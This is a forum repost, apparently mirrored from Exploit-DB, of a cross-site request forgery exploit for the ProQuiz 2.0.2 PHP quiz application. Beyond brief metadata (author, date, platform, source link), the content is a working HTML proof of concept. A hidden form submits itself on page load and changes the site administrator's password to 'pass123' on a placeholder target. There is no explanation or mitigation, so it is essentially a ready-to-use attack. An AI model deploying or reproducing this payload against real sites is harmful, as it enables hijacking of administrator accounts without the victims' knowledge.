Exploit ProQuiz 2.0.2 - Cross-Site Request Forgery

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
20550
Проверка EDB
  1. Пройдено
Автор
DAONE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2012-08-16
Код:
##########################################

[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability

[~] Author: DaOne

[~] Date: 19/8/2012

[~] Software Link: http://code.google.com/p/proquiz/downloads/list

##########################################



[#] [ CSRF Change Admin Password ]



</form>

<html>

<body onload="document.form0.submit();">

<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">

<input type="hidden" name="password" value="pass123"/>

<input type="hidden" name="cpassword" value="pass123"/>

</form>

</body>

</html>



##########################################
 
Источник
www.exploit-db.com

Похожие темы